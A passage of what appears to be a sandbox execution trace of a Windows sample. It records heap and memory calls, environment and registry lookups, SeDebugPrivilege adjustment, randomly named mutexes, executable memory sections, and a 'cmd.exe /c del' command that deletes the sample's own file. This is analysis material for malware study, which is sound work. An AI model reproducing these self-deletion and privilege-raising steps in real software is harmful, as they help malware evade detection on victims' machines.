Flags=0x0, BaseAddress=0x753bb0) returned 1 [0080.899] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3000) returned 0x756bc0 [0080.900] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x754bb8) returned 1 [0080.900] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4000) returned 0x759bc8 [0080.900] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x756bc0) returned 1 [0080.900] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x5000) returned 0x753bb0 [0080.900] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x759bc8) returned 1 [0080.900] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1000) returned 0x758bb8 [0080.900] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x2000) returned 0x759bc0 [0080.900] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x758bb8) returned 1 [0080.900] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3000) returned 0x75bbc8 [0080.901] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x759bc0) returned 1 [0080.901] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4000) returned 0x75ebd0 [0080.901] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x75bbc8) returned 1 [0080.901] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x5000) returned 0x758bb8 [0080.901] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x75ebd0) returned 1 [0080.901] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1000) returned 0x75dbc0 [0080.901] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x2000) returned 0x75ebc8 [0080.901] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x75dbc0) returned 1 [0080.901] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3000) returned 0x760bd0 [0080.901] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x75ebc8) returned 1 [0080.901] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4000) returned 0x763bd8 [0080.903] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x760bd0) returned 1 [0080.903] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x5000) returned 0x75dbc0 [0080.903] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x763bd8) returned 1 [0080.904] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x751ba0) returned 1 [0080.904] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x752ba8) returned 1 [0080.904] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x753bb0) returned 1 [0080.904] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x758bb8) returned 1 [0080.904] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x75dbc0) returned 1 [0080.926] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1000) returned 0x751ba0 [0080.926] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1000) returned 0x752ba8 [0080.926] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1000) returned 0x753bb0 [0080.926] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x2000) returned 0x754bb8 [0080.926] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x753bb0) returned 1 [0080.926] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3000) returned 0x756bc0 [0080.926] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x754bb8) returned 1 [0080.926] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4000) returned 0x759bc8 [0080.926] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x756bc0) returned 1 [0080.926] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x5000) returned 0x753bb0 [0080.927] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x759bc8) returned 1 [0080.927] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1000) returned 0x758bb8 [0080.927] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x2000) returned 0x759bc0 [0080.927] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x758bb8) returned 1 [0080.927] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3000) returned 0x75bbc8 [0080.927] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x759bc0) returned 1 [0080.927] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4000) returned 0x75ebd0 [0080.927] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x75bbc8) returned 1 [0080.927] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x5000) returned 0x758bb8 [0080.927] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x75ebd0) returned 1 [0080.927] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1000) returned 0x75dbc0 [0080.927] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x2000) returned 0x75ebc8 [0080.927] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x75dbc0) returned 1 [0080.927] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3000) returned 0x760bd0 [0080.927] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x75ebc8) returned 1 [0080.927] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4000) returned 0x763bd8 [0080.927] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x760bd0) returned 1 [0080.927] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x5000) returned 0x75dbc0 [0080.927] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x763bd8) returned 1 [0080.928] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x751ba0) returned 1 [0080.928] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x752ba8) returned 1 [0080.928] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x753bb0) returned 1 [0080.928] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x758bb8) returned 1 [0080.928] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x75dbc0) returned 1 [0080.928] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SysWOW64\\ntdll.dll", NtPathName=0x14edbc, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SysWOW64\\ntdll.dll", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0080.928] NtCreateFile (in: FileHandle=0x14eddc, DesiredAccess=0x120089, ObjectAttributes=0x14eda4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SysWOW64\\ntdll.dll", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14edc4, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14eddc*=0x60, IoStatusBlock=0x14edc4*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0080.928] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x751ba0) returned 1 [0080.928] NtQueryInformationFile (in: FileHandle=0x60, IoStatusBlock=0x14edc4, FileInformation=0x14eb38, Length=0x208, FileInformationClass=0x9 | out: IoStatusBlock=0x14edc4, FileInformation=0x14eb38) returned 0x0 [0080.929] NtClose (Handle=0x60) returned 0x0 [0080.929] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x751ba0 [0080.929] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x751ba0) returned 1 [0080.933] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x75131320, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x14edf8, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x14edf8*(BaseAddress=0x75131000, AllocationBase=0x75130000, AllocationProtect=0x80, RegionSize=0x3000, State=0x1000, Protect=0x20, Type=0x1000000), ResultLength=0x0) returned 0x0 [0081.405] NtQuerySystemInformation (in: SystemInformationClass=0x23, SystemInformation=0x14ee50, Length=0x2, ResultLength=0x0 | out: SystemInformation=0x14ee50, ResultLength=0x0) returned 0x0 [0081.409] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x7, ProcessInformation=0x14ee74, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x14ee74, ReturnLength=0x0) returned 0x0 [0081.434] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x1d80020) returned 1 [0081.445] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14eb04*=0x0, ZeroBits=0x0, RegionSize=0x14eb08*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14eb04*=0x170000, RegionSize=0x14eb08*=0x10000) returned 0x0 [0081.449] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0081.459] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ee64*=0x170000, RegionSize=0x14eb28, FreeType=0x8000) returned 0x0 [0081.460] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14eaf0*=0x0, ZeroBits=0x0, RegionSize=0x14eaf4*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14eaf0*=0x170000, RegionSize=0x14eaf4*=0x20000) returned 0x0 [0081.460] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0081.482] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ee64*=0x170000, RegionSize=0x14ee68, FreeType=0x8000) returned 0x0 [0081.494] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0x14ec20 | out: Value="kEecfMwgj") returned 0x0 [0081.516] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x14ee7c | out: TokenHandle=0x14ee7c*=0x60) returned 0x0 [0081.520] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x14ee70 | out: lpLuid=0x14ee70*(LowPart=0x14, HighPart=0)) returned 1 [0081.537] NtAdjustPrivilegesToken (in: TokenHandle=0x60, DisableAllPrivileges=0, NewState=0x14ee6c, BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 0x106 [0081.539] NtClose (Handle=0x60) returned 0x0 [0081.540] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0x14e7b0 | out: Value="kEecfMwgj") returned 0x0 [0081.540] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="62AQ09U8", Value=0x14ec5c | out: Value=0x14ec5c) returned 0xc0000100 [0081.540] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0x14e590 | out: Value="kEecfMwgj") returned 0x0 [0081.560] NtOpenDirectoryObject (in: FileHandle=0x14ea50, DesiredAccess=0x2000f, ObjectAttributes=0x14ea1c*(Length=0x18, RootDirectory=0x0, ObjectName="\\BaseNamedObjects", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0) | out: FileHandle=0x14ea50*=0x60) returned 0x0 [0081.562] NtCreateMutant (in: MutantHandle=0x14ec7c, DesiredAccess=0x1f0001, ObjectAttributes=0x14ea04*(Length=0x18, RootDirectory=0x60, ObjectName="62AQ09U8C34JCCAZ", Attributes=0x80, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), InitialOwner=0 | out: MutantHandle=0x14ec7c*=0xa4) returned 0x0 [0081.562] NtClose (Handle=0x60) returned 0x0 [0081.585] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1000) returned 0x755500 [0081.586] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1000) returned 0x756508 [0081.586] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1000) returned 0x757510 [0081.586] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="ProgramFiles", Value=0x14e8bc | out: Value="C:\\Program Files (x86)") returned 0x0 [0081.586] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="APPDATA", Value=0x14e8b8 | out: Value="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x0 [0081.597] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Desktop\\cc.exe", NtPathName=0x14e864, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Desktop\\cc.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0081.600] NtCreateFile (in: FileHandle=0x14e884, DesiredAccess=0x120089, ObjectAttributes=0x14e84c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Desktop\\cc.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e86c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e884*=0x0, IoStatusBlock=0x14e86c*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0081.600] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x758518) returned 1 [0081.600] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\Desktop\\cc.exe", NtPathName=0x14ec34, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\Desktop\\cc.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0081.600] NtCreateFile (in: FileHandle=0x14ec54, DesiredAccess=0x120089, ObjectAttributes=0x14ec1c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\Desktop\\cc.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14ec3c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14ec54*=0x60, IoStatusBlock=0x14ec3c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0081.601] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x758518) returned 1 [0081.604] NtQueryInformationFile (in: FileHandle=0x60, IoStatusBlock=0x14ec3c, FileInformation=0x14eb94, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x14ec3c, FileInformation=0x14eb94) returned 0x0 [0081.605] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x100400) returned 0x1d80020 [0081.627] NtReadFile (in: FileHandle=0x60, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x14ec3c, Buffer=0x1d80020, BufferLength=0x100000, ByteOffset=0x14ebac*=0, Key=0x0 | out: IoStatusBlock=0x14ec3c, Buffer=0x1d80020*) returned 0x0 [0081.641] NtClose (Handle=0x60) returned 0x0 [0081.641] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\Desktop\\cc.exe", NtPathName=0x14ec24, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\Desktop\\cc.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0081.641] NtCreateFile (in: FileHandle=0x14ec44, DesiredAccess=0x120089, ObjectAttributes=0x14ec0c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\Desktop\\cc.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14ec2c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14ec44*=0x60, IoStatusBlock=0x14ec2c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0081.641] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x758518) returned 1 [0081.641] NtQueryInformationFile (in: FileHandle=0x60, IoStatusBlock=0x14ec2c, FileInformation=0x14eb84, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x14ec2c, FileInformation=0x14eb84) returned 0x0 [0081.641] NtClose (Handle=0x60) returned 0x0 [0081.641] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SysWOW64\\ntdll.dll", NtPathName=0x14e124, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SysWOW64\\ntdll.dll", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0081.641] NtCreateFile (in: FileHandle=0x14e144, DesiredAccess=0x120089, ObjectAttributes=0x14e10c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SysWOW64\\ntdll.dll", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e12c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e144*=0x60, IoStatusBlock=0x14e12c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0081.641] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x758518) returned 1 [0081.642] NtQueryInformationFile (in: FileHandle=0x60, IoStatusBlock=0x14e12c, FileInformation=0x14dea0, Length=0x208, FileInformationClass=0x9 | out: IoStatusBlock=0x14e12c, FileInformation=0x14dea0) returned 0x0 [0081.642] NtClose (Handle=0x60) returned 0x0 [0081.642] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x758518 [0081.642] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x758518) returned 1 [0081.643] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Windows\\SysWOW64\\cmd.exe", lpCommandLine="/c del \"C:\\Users\\kEecfMwgj\\Desktop\\cc.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x14e7f4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x14e838, hNewToken=0x0 | out: lpProcessInformation=0x14e838*(hProcess=0xa8, hThread=0x60, dwProcessId=0xfac, dwThreadId=0xfb0), hNewToken=0x0) returned 1 [0082.019] NtWaitForSingleObject (Object=0xa8, Alertable=0, Time=0x0) returned 0x0 [0083.133] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="ProgramFiles", Value=0x14e510 | out: Value="C:\\Program Files (x86)") returned 0x0 [0084.626] SetErrorMode (uMode=0x8003) returned 0x1 [0084.628] NtCreateSection (in: SectionHandle=0x14e89c, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x14e61c, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x14e89c*=0xb0) returned 0x0 [0084.632] NtMapViewOfSection (in: SectionHandle=0xb0, ProcessHandle=0xffffffff, BaseAddress=0x14e8a0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x14e61c*=0x28c00, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x14e8a0*=0x1d0000, SectionOffset=0x0, ViewSize=0x14e61c*=0x29000) returned 0x0 [0084.636] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e614*=0x0, ZeroBits=0x0, RegionSize=0x14e618*=0x28c00, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0x14e614*=0x200000, RegionSize=0x14e618*=0x29000) returned 0x0 [0084.639] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x2000) returned 0x75a740 [0084.639] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x14e358 | out: TokenHandle=0x14e358*=0xac) returned 0x0 [0084.643] NtQueryInformationToken (in: TokenHandle=0xac, TokenInformationClass=0x1, TokenInformation=0x14db50, TokenInformationLength=0x400, ReturnLength=0x14e350 | out: TokenInformation=0x14db50, ReturnLength=0x14e350) returned 0x0 [0084.644] ConvertSidToStringSidW (in: Sid=0x14db58*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), StringSid=0x14e354 | out: StringSid=0x14e354*="S-1-5-21-4219442223-4223814209-3835049652-1000") returned 1 [0084.644] NtClose (Handle=0xac) returned 0x0 [0084.644] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e5c8*=0x0, ZeroBits=0x0, RegionSize=0x14e5cc*=0x8f646, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x14e5c8*=0x1c40000, RegionSize=0x14e5cc*=0x90000) returned 0x0 [0084.647] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e5b4*=0x0, ZeroBits=0x0, RegionSize=0x14e5b8*=0x8f646, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x14e5b4*=0x2220000, RegionSize=0x14e5b8*=0x90000) returned 0x0 [0084.655] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x75a740) returned 1 [0084.655] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1000) returned 0x75a740 [0084.655] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0084.655] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0084.655] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0084.656] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0084.656] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0084.657] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0x14dce0 | out: Value="kEecfMwgj") returned 0x0 [0084.657] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="APPDATA", Value=0x14e04c | out: Value="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x0 [0084.658] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="APPDATA", Value=0x14e03c | out: Value="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x0 [0084.658] NtCreateSection (in: SectionHandle=0x14f68c, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x14e064, SectionPageProtection=0x4, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x14f68c*=0xac) returned 0x0 [0084.658] NtMapViewOfSection (in: SectionHandle=0xac, ProcessHandle=0xffffffff, BaseAddress=0x14f688*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x14e064*=0x1b58000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x14f688*=0x22b0000, SectionOffset=0x0, ViewSize=0x14e064*=0x1b58000) returned 0x0 [0084.659] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4000) returned 0x75b748 [0084.659] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x14d7fc | out: TokenHandle=0x14d7fc*=0xb4) returned 0x0 [0084.660] NtQueryInformationToken (in: TokenHandle=0xb4, TokenInformationClass=0x1, TokenInformation=0x14cff4, TokenInformationLength=0x400, ReturnLength=0x14d7f4 | out: TokenInformation=0x14cff4, ReturnLength=0x14d7f4) returned 0x0 [0084.660] ConvertSidToStringSidW (in: Sid=0x14cffc*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), StringSid=0x14d7f8 | out: StringSid=0x14d7f8*="S-1-5-21-4219442223-4223814209-3835049652-1000") returned 1 [0084.660] NtClose (Handle=0xb4) returned 0x0 [0084.679] RtlIntegerToChar (in: Value=0x25ba05, Base=0x10, Length=0x20, String=0x22ba4a9 | out: String="25BA05") returned 0x0 [0084.685] NtCreateKey (in: KeyHandle=0x14e270, DesiredAccess=0x20219, ObjectAttributes=0x14d7fc*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\Machine\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e270*=0xb4) returned 0x0 [0084.689] NtQueryValueKey (in: KeyHandle=0xb4, ValueName="ProductName", KeyValueInformationClass=0x1, KeyValueInformation=0x14de48, Length=0x100, ResultLength=0x14e2c4 | out: KeyValueInformation=0x14de48*(TitleIndex=0x0, Type=0x1, DataOffset=0x30, DataLength=0x2e, NameLength=0x16, Name="ProductName", Data="Windows 7 Professional"), ResultLength=0x14e2c4) returned 0x0 [0084.689] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14d82c*=0x0, ZeroBits=0x0, RegionSize=0x14d830*=0x1f4400, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0x14d82c*=0x3e10000, RegionSize=0x14d830*=0x1f5000) returned 0x0 [0084.690] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14d818*=0x0, ZeroBits=0x0, RegionSize=0x14d81c*=0x1f4400, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0x14d818*=0x4010000, RegionSize=0x14d81c*=0x1f5000) returned 0x0 [0084.690] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="TEMP", Value=0x14d81c | out: Value="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 0x0 [0084.690] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="ProgramFiles", Value=0x14d7e4 | out: Value="C:\\Program Files (x86)") returned 0x0 [0084.945] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x8d599, lpParameter=0x14eeb0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xb8 [0084.946] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4000) returned 0x75f750 [0084.946] NtOpenDirectoryObject (in: FileHandle=0x14e05c, DesiredAccess=0x2000f, ObjectAttributes=0x14e028*(Length=0x18, RootDirectory=0x0, ObjectName="\\BaseNamedObjects", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0) | out: FileHandle=0x14e05c*=0xbc) returned 0x0 [0084.946] NtCreateMutant (in: MutantHandle=0x14e2e0, DesiredAccess=0x1f0001, ObjectAttributes=0x14e010*(Length=0x18, RootDirectory=0xbc, ObjectName="O03PR-DCBVW8A2DZ", 